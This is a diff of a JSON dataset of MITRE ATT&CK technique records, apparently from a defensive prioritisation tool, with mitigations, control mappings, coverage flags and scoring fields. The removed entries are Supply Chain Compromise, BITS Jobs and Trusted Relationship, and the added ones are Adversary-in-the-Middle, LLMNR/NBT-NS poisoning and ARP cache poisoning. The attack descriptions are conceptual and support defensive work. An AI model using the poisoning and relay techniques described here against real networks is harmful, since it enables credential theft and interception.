-            "Network Traffic: Network Traffic Content"
+            "File: File Modification"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1556",
         "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1048",
-                "name": "Application Isolation and Sandboxing",
-                "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.",
-                "url": "https://attack.mitre.org/mitigations/M1048"
-            },
-            {
-                "mid": "M1050",
-                "name": "Exploit Protection",
-                "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.",
-                "url": "https://attack.mitre.org/mitigations/M1050"
-            },
-            {
-                "mid": "M1030",
-                "name": "Network Segmentation",
-                "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
-                "url": "https://attack.mitre.org/mitigations/M1030"
+                "mid": "M1032",
+                "name": "Multi-factor Authentication",
+                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                "url": "https://attack.mitre.org/mitigations/M1032"
             },
             {
                 "mid": "M1026",
                 "name": "Privileged Account Management",
                 "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
                 "url": "https://attack.mitre.org/mitigations/M1026"
-            },
-            {
-                "mid": "M1051",
-                "name": "Update Software",
-                "description": "Perform regular software updates to mitigate exploitation risk.",
-                "url": "https://attack.mitre.org/mitigations/M1051"
-            },
-            {
-                "mid": "M1016",
-                "name": "Vulnerability Scanning",
-                "description": "Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.",
-                "url": "https://attack.mitre.org/mitigations/M1016"
             }
         ],
-        "cumulative_score": 1.083194640952381,
-        "adjusted_score": 1.083194640952381,
+        "cumulative_score": 0.32857142857142857,
+        "adjusted_score": 0.32857142857142857,
         "has_car": false,
-        "has_sigma": true,
-        "has_es_siem": true,
-        "has_splunk": true,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
         "cis_controls": [
-            "3.12",
-            "4.4",
+            "4.1",
             "4.7",
+            "5.2",
             "5.3",
-            "5.5",
+            "5.4",
             "6.1",
             "6.2",
+            "6.4",
+            "6.5",
             "6.8",
-            "7.1",
-            "7.2",
-            "7.3",
-            "7.4",
-            "7.6",
-            "7.7",
-            "10.5",
-            "12.1",
-            "12.2",
-            "12.8",
-            "16.13",
-            "16.8",
-            "18.1",
-            "18.2",
-            "18.3",
-            "13.10"
+            "12.2"
         ],
         "nist_controls": [
             "AC-2",
+            "AC-20",
             "AC-3",
-            "AC-4",
             "AC-5",
             "AC-6",
-            "CA-2",
-            "CA-7",
+            "AC-7",
+            "CM-2",
             "CM-5",
             "CM-6",
-            "CM-7",
-            "CM-8",
             "IA-2",
-            "IA-8",
-            "RA-10",
-            "RA-5",
-            "SA-8",
-            "SC-18",
-            "SC-2",
-            "SC-29",
-            "SC-3",
-            "SC-30",
-            "SC-39",
-            "SC-46",
-            "SC-7",
-            "SI-10",
-            "SI-2",
-            "SI-3",
+            "IA-5",
             "SI-4",
             "SI-7"
         ],
         "process_coverage": false,
-        "network_coverage": true,
+        "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.9809523809523809,
-            "mitigation_score": 0.9636363636363636,
-            "detection_score": 1
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0.00224226
+        "hardware_coverage": false
     },
     {
-        "tid": "T1195",
-        "name": "Supply Chain Compromise",
-        "description": "Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply chain compromise can take place at any stage of the supply chain including:\n\n* Manipulation of development tools\n* Manipulation of a development environment\n* Manipulation of source code repositories (public or private)\n* Manipulation of source code in open-source dependencies\n* Manipulation of software update/distribution mechanisms\n* Compromised/infected system images (multiple cases of removable media infected at the factory) (Citation: IBM Storwize) (Citation: Schneider Electric USB Malware) \n* Replacement of legitimate software with modified versions\n* Sales of modified/counterfeit products to legitimate distributors\n* Shipment interdiction\n\nWhile supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels. (Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil 2018) (Citation: Command Five SK 2011) Targeting may be specific to a desired victim set (Citation: Symantec Elderwood Sept 2012) or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. (Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM Compromise)",
-        "url": "https://attack.mitre.org/techniques/T1195",
+        "tid": "T1557",
+        "name": "Adversary-in-the-Middle",
+        "description": "Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics)\n\nAdversaries may leverage the AiTM position to attempt to modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can also stop traffic from flowing to the appropriate destination, causing denial of service.",
+        "url": "https://attack.mitre.org/techniques/T1557",
         "tactics": [
-            "Initial Access"
+            "Collection",
+            "Credential Access"
         ],
-        "detection": "Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. Perform physical inspection of hardware to look for potential tampering.",
+        "detection": "Monitor network traffic for anomalies associated with known AiTM behavior. Consider monitoring for modifications to system configuration files involved in shaping network traffic flow.",
         "platforms": [
             "Linux",
             "Windows",
             "macOS"
         ],
-        "data_sources": [],
+        "data_sources": [
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow",
+            "Service: Service Creation",
+            "Windows Registry: Windows Registry Key Modification"
+        ],
         "is_subtechnique": false,
         "supertechnique": null,
         "subtechniques": [
             {
-                "tid": "T1195.001",
-                "name": "Supply Chain Compromise: Compromise Software Dependencies and Development Tools",
-                "url": "https://attack.mitre.org/techniques/T1195/001",
-                "description": "Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM Compromise)  \n\nTargeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. ",
-                "detection": "Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. ",
+                "tid": "T1557.001",
+                "name": "Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay",
+                "url": "https://attack.mitre.org/techniques/T1557/001",
+                "description": "By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials. \n\nLink-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR) (Citation: TechNet NetBIOS)\n\nAdversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords. In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it. (Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay)\n\nSeveral tools exist that can be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174). (Citation: GitHub NBNSpoof) (Citation: Rapid7 LLMNR Spoofer) (Citation: GitHub Responder)",
+                "detection": "Monitor HKLM\\Software\\Policies\\Microsoft\\Windows NT\\DNSClient for changes to the \"EnableMulticast\" DWORD value. A value of “0” indicates LLMNR is disabled. (Citation: Sternsecurity LLMNR-NBTNS)\n\nMonitor for traffic on ports UDP 5355 and UDP 137 if LLMNR/NetBIOS is disabled by security policy.\n\nDeploy an LLMNR/NBT-NS spoofing detection tool.(Citation: GitHub Conveigh) Monitoring of Windows event logs for event IDs 4697 and 7045 may help in detecting successful relay techniques.(Citation: Secure Ideas SMB Relay)",
                 "mitigations": [
                     {
-                        "mid": "M1051",
-                        "name": "Update Software",
-                        "description": "Perform regular software updates to mitigate exploitation risk.",
-                        "url": "https://attack.mitre.org/mitigations/M1051"
+                        "mid": "M1042",
+                        "name": "Disable or Remove Feature or Program",
+                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1042"
                     },
                     {
-                        "mid": "M1016",
-                        "name": "Vulnerability Scanning",
-                        "description": "Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.",
-                        "url": "https://attack.mitre.org/mitigations/M1016"
-                    }
-                ]
-            },
-            {
-                "tid": "T1195.002",
-                "name": "Supply Chain Compromise: Compromise Software Supply Chain",
-                "url": "https://attack.mitre.org/techniques/T1195/002",
-                "description": "Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.\n\nTargeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011)  ",
-                "detection": "Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. ",
-                "mitigations": [
+                        "mid": "M1037",
+                        "name": "Filter Network Traffic",
+                        "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                        "url": "https://attack.mitre.org/mitigations/M1037"
+                    },
                     {
-                        "mid": "M1051",
-                        "name": "Update Software",
-                        "description": "Perform regular software updates to mitigate exploitation risk.",
-                        "url": "https://attack.mitre.org/mitigations/M1051"
+                        "mid": "M1031",
+                        "name": "Network Intrusion Prevention",
+                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1031"
                     },
                     {
-                        "mid": "M1016",
-                        "name": "Vulnerability Scanning",
-                        "description": "Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.",
-                        "url": "https://attack.mitre.org/mitigations/M1016"
+                        "mid": "M1030",
+                        "name": "Network Segmentation",
+                        "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                        "url": "https://attack.mitre.org/mitigations/M1030"
                     }
                 ]
             },
             {
-                "tid": "T1195.003",
-                "name": "Supply Chain Compromise: Compromise Hardware Supply Chain",
-                "url": "https://attack.mitre.org/techniques/T1195/003",
-                "description": "Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise. By modifying hardware or firmware in the supply chain, adversaries can insert a backdoor into consumer networks that may be difficult to detect and give the adversary a high degree of control over the system. Hardware backdoors may be inserted into various devices, such as servers, workstations, network infrastructure, or peripherals.",
-                "detection": "Perform physical inspection of hardware to look for potential tampering. Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes.",
+                "tid": "T1557.002",
+                "name": "Adversary-in-the-Middle: ARP Cache Poisoning",
+                "url": "https://attack.mitre.org/techniques/T1557/002",
+                "description": "Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices. This activity may be used to enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002).\n\nThe ARP protocol is used to resolve IPv4 addresses to link layer addresses, such as a media access control (MAC) address.(Citation: RFC826 ARP) Devices in a local network segment communicate with each other by using link layer addresses. If a networked device does not have the link layer address of a particular networked device, it may send out a broadcast ARP request to the local network to translate the IP address to a MAC address. The device with the associated IP address directly replies with its MAC address. The networked device that made the ARP request will then use as well as store that information in its ARP cache.\n\nAn adversary may passively wait for an ARP request to poison the ARP cache of the requesting device. The adversary may reply with their MAC address, thus deceiving the victim by making them believe that they are communicating with the intended networked device. For the adversary to poison the ARP cache, their reply must be faster than the one made by the legitimate IP address owner. Adversaries may also send a gratuitous ARP reply that maliciously announces the ownership of a particular IP address to all the devices in the local network segment.\n\nThe ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)\n\nAdversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)\n",
+                "detection": "Monitor network traffic for unusual ARP traffic, gratuitous ARP replies may be suspicious. \n\nConsider collecting changes to ARP caches across endpoints for signs of ARP poisoning. For example, if multiple IP addresses map to a single MAC address, this could be an indicator that the ARP cache has been poisoned.",
                 "mitigations": [
                     {
-                        "mid": "M1046",
-                        "name": "Boot Integrity",
-                        "description": "Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.",
-                        "url": "https://attack.mitre.org/mitigations/M1046"
-                    }
-                ]
-            }
-        ],
-        "mitigations": [
-            {
-                "mid": "M1051",
-                "name": "Update Software",
-                "description": "Perform regular software updates to mitigate exploitation risk.",
-                "url": "https://attack.mitre.org/mitigations/M1051"
-            },
-            {
-                "mid": "M1016",
-                "name": "Vulnerability Scanning",
-                "description": "Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.",
-                "url": "https://attack.mitre.org/mitigations/M1016"
-            }
-        ],
-        "cumulative_score": 0.3516381976190477,
-        "adjusted_score": 0.3516381976190477,
-        "has_car": false,
-        "has_sigma": true,
-        "has_es_siem": true,
-        "has_splunk": true,
-        "cis_controls": [
-            "7.1",
-            "7.2",
-            "7.3",
-            "7.4",
-            "7.5",
-            "16.1",
-            "16.11",
-            "16.12",
-            "16.2",
-            "16.3",
-            "16.4",
-            "16.5",
-            "18.3",
-            "18.5"
-        ],
-        "nist_controls": [
-            "CA-2",
-            "CA-7",
-            "CM-11",
-            "CM-7",
-            "RA-10",
-            "RA-5",
-            "SA-22",
-            "SI-2"
-        ],
-        "process_coverage": false,
-        "network_coverage": false,
-        "file_coverage": true,
-        "cloud_coverage": false,
-        "hardware_coverage": true,
-        "actionability_score": {
-            "combined_score": 0.24761904761904766,
-            "mitigation_score": 0.4,
-            "detection_score": 0.08
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0.00401915
-    },
-    {
-        "tid": "T1197",
-        "name": "BITS Jobs",
-        "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.\n\nThe interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin)\n\nAdversaries may abuse BITS to download, execute, and even clean up after running malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016)\n\nBITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016)",
-        "url": "https://attack.mitre.org/techniques/T1197",
-        "tactics": [
-            "Defense Evasion",
-            "Persistence"
-        ],
-        "detection": "BITS runs as a service and its status can be checked with the Sc query utility (sc query bits).(Citation: Microsoft Issues with BITS July 2011) Active BITS tasks can be enumerated using the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (bitsadmin /list /allusers /verbose).(Citation: Microsoft BITS)\n\nMonitor usage of the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (especially the ‘Transfer’, 'Create', 'AddFile', 'SetNotifyFlags', 'SetNotifyCmdLine', 'SetMinRetryDelay', 'SetCustomHeaders', and 'Resume' command options)(Citation: Microsoft BITS) Admin logs, PowerShell logs, and the Windows Event log for BITS activity.(Citation: Elastic - Hunting for Persistence Part 1) Also consider investigating more detailed information about jobs by parsing the BITS job database.(Citation: CTU BITS Malware June 2016)\n\nMonitor and analyze network activity generated by BITS. BITS jobs use HTTP(S) and SMB for remote connections and are tethered to the creating user and will only function when that user is logged on (this rule applies even if a user attaches the job to a service account).(Citation: Microsoft BITS)",
-        "platforms": [
-            "Windows"
-        ],
-        "data_sources": [
-            "Command: Command Execution",
-            "Network Traffic: Network Connection Creation",
-            "Process: Process Creation",
-            "Service: Service Metadata"
+                        "mid": "M1042",
+                        "name": "Disable or Remove Feature or Program",
+                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1042"
+                    },
+                    {
+                        "mid": "M1041",
+                        "name": "Encrypt Sensitive Information",
+                        "description": "Protect sensitive information with strong encryption.",
+                        "url": "https://attack.mitre.org/mitigations/M1041"
+                    },
+                    {
+                        "mid": "M1037",
+                        "name": "Filter Network Traffic",
+                        "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                        "url": "https://attack.mitre.org/mitigations/M1037"
+                    },
+                    {
+                        "mid": "M1035",
+                        "name": "Limit Access to Resource Over Network",
+                        "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.",
+                        "url": "https://attack.mitre.org/mitigations/M1035"
+                    },
+                    {
+                        "mid": "M1031",
+                        "name": "Network Intrusion Prevention",
+                        "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1031"
+                    },
+                    {
+                        "mid": "M1017",
+                        "name": "User Training",
+                        "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                        "url": "https://attack.mitre.org/mitigations/M1017"
+                    }
+                ]
+            }
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [],
         "mitigations": [
+            {
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
+            },
+            {
+                "mid": "M1041",
+                "name": "Encrypt Sensitive Information",
+                "description": "Protect sensitive information with strong encryption.",
+                "url": "https://attack.mitre.org/mitigations/M1041"
+            },
             {
                 "mid": "M1037",
                 "name": "Filter Network Traffic",
@@ -8529,163 +31225,234 @@
                 "url": "https://attack.mitre.org/mitigations/M1037"
             },
             {
-                "mid": "M1028",
-                "name": "Operating System Configuration",
-                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
-                "url": "https://attack.mitre.org/mitigations/M1028"
+                "mid": "M1035",
+                "name": "Limit Access to Resource Over Network",
+                "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.",
+                "url": "https://attack.mitre.org/mitigations/M1035"
             },
             {
-                "mid": "M1018",
-                "name": "User Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                "url": "https://attack.mitre.org/mitigations/M1018"
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
+            },
+            {
+                "mid": "M1030",
+                "name": "Network Segmentation",
+                "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                "url": "https://attack.mitre.org/mitigations/M1030"
+            },
+            {
+                "mid": "M1017",
+                "name": "User Training",
+                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                "url": "https://attack.mitre.org/mitigations/M1017"
             }
         ],
-        "cumulative_score": 0.6856440557142857,
-        "adjusted_score": 0.6856440557142857,
-        "has_car": true,
+        "cumulative_score": 0.772201521904762,
+        "adjusted_score": 0.772201521904762,
+        "has_car": false,
         "has_sigma": true,
-        "has_es_siem": true,
-        "has_splunk": true,
+        "has_es_siem": false,
+        "has_splunk": false,
         "cis_controls": [
+            "3.12",
             "4.1",
             "4.2",
             "4.4",
-            "4.5",
-            "4.7",
-            "5.3",
-            "5.4",
-            "6.1",
-            "6.2",
-            "6.8",
+            "4.6",
+            "4.8",
+            "7.6",
+            "7.7",
+            "12.2",
+            "12.8",
+            "13.3",
             "13.4",
+            "13.8",
+            "14.2",
+            "14.6",
+            "16.8",
             "18.2",
             "18.3",
-            "18.5"
+            "18.5",
+            "16.10",
+            "3.10"
         ],
         "nist_controls": [
-            "AC-2",
+            "AC-16",
+            "AC-17",
+            "AC-18",
+            "AC-19",
+            "AC-20",
             "AC-3",
             "AC-4",
-            "AC-5",
-            "AC-6",
             "CA-7",
-            "CM-5",
+            "CM-2",
             "CM-6",
             "CM-7",
-            "IA-2",
+            "CM-8",
+            "RA-5",
+            "SC-23",
+            "SC-4",
+            "SC-46",
             "SC-7",
+            "SC-8",
             "SI-10",
+            "SI-12",
             "SI-15",
-            "SI-4"
+            "SI-3",
+            "SI-4",
+            "SI-7"
         ],
         "process_coverage": true,
         "network_coverage": true,
-        "file_coverage": false,
+        "file_coverage": true,
         "cloud_coverage": false,
         "hardware_coverage": false,
         "actionability_score": {
-            "combined_score": 0.3857142857142857,
-            "mitigation_score": 0.509090909090909,
-            "detection_score": 0.25
+            "combined_score": 0.46190476190476193,
+            "mitigation_score": 0.8181818181818182,
+            "detection_score": 0.07
         },
-        "choke_point_score": 0.25,
-        "prevalence_score": 0.04992977
+        "choke_point_score": 0.3,
+        "prevalence_score": 0.01029676
     },
     {
-        "tid": "T1199",
-        "name": "Trusted Relationship",
-        "description": "Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship exploits an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.\n\nOrganizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used.(Citation: CISA IT Service Providers)",
-        "url": "https://attack.mitre.org/techniques/T1199",
+        "tid": "T1557.001",
+        "name": "Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay",
+        "description": "By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials. \n\nLink-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR) (Citation: TechNet NetBIOS)\n\nAdversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through [Network Sniffing](https://attack.mitre.org/techniques/T1040) and crack the hashes offline through [Brute Force](https://attack.mitre.org/techniques/T1110) to obtain the plaintext passwords. In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it. (Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay)\n\nSeveral tools exist that can be used to poison name services within local networks such as NBNSpoof, Metasploit, and [Responder](https://attack.mitre.org/software/S0174). (Citation: GitHub NBNSpoof) (Citation: Rapid7 LLMNR Spoofer) (Citation: GitHub Responder)",
+        "url": "https://attack.mitre.org/techniques/T1557/001",
         "tactics": [
-            "Initial Access"
+            "Collection",
+            "Credential Access"
         ],
-        "detection": "Establish monitoring for activity conducted by second and third party providers and other trusted entities that may be leveraged as a means to gain access to the network. Depending on the type of relationship, an adversary may have access to significant amounts of information about the target before conducting an operation, especially if the trusted relationship is based on IT services. Adversaries may be able to act quickly towards an objective, so proper monitoring for behavior related to Credential Access, Lateral Movement, and Collection will be important to detect the intrusion.",
+        "detection": "Monitor HKLM\\Software\\Policies\\Microsoft\\Windows NT\\DNSClient for changes to the \"EnableMulticast\" DWORD value. A value of “0” indicates LLMNR is disabled. (Citation: Sternsecurity LLMNR-NBTNS)\n\nMonitor for traffic on ports UDP 5355 and UDP 137 if LLMNR/NetBIOS is disabled by security policy.\n\nDeploy an LLMNR/NBT-NS spoofing detection tool.(Citation: GitHub Conveigh) Monitoring of Windows event logs for event IDs 4697 and 7045 may help in detecting successful relay techniques.(Citation: Secure Ideas SMB Relay)",
         "platforms": [
-            "IaaS",
-            "Linux",
-            "SaaS",
-            "Windows",
-            "macOS"
+            "Windows"
         ],
         "data_sources": [
-            "Application Log: Application Log Content",
-            "Logon Session: Logon Session Creation",
-            "Logon Session: Logon Session Metadata"
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow",
+            "Service: Service Creation",
+            "Windows Registry: Windows Registry Key Modification"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1557",
         "subtechniques": [],
         "mitigations": [
+            {
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
+            },
+            {
+                "mid": "M1037",
+                "name": "Filter Network Traffic",
+                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                "url": "https://attack.mitre.org/mitigations/M1037"
+            },
+            {
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
+            },
             {
                 "mid": "M1030",
                 "name": "Network Segmentation",
                 "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
                 "url": "https://attack.mitre.org/mitigations/M1030"
-            },
-            {
-                "mid": "M1052",
-                "name": "User Account Control",
-                "description": "Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.",
-                "url": "https://attack.mitre.org/mitigations/M1052"
             }
         ],
-        "cumulative_score": 0.24761904761904763,
-        "adjusted_score": 0.24761904761904763,
+        "cumulative_score": 0.4095238095238095,
+        "adjusted_score": 0.4095238095238095,
         "has_car": false,
-        "has_sigma": true,
+        "has_sigma": false,
         "has_es_siem": false,
         "has_splunk": true,
         "cis_controls": [
             "3.12",
             "4.1",
+            "4.2",
             "4.4",
+            "4.5",
+            "4.8",
+            "7.6",
+            "7.7",
             "12.2",
             "12.8",
-            "15.7"
+            "13.3",
+            "13.8",
+            "16.8",
+            "18.2",
+            "18.3",
+            "18.5"
         ],
         "nist_controls": [
             "AC-3",
             "AC-4",
-            "AC-6",
-            "AC-8",
+            "CA-7",
+            "CM-2",
             "CM-6",
             "CM-7",
+            "CM-8",
+            "SC-23",
             "SC-46",
-            "SC-7"
+            "SC-7",
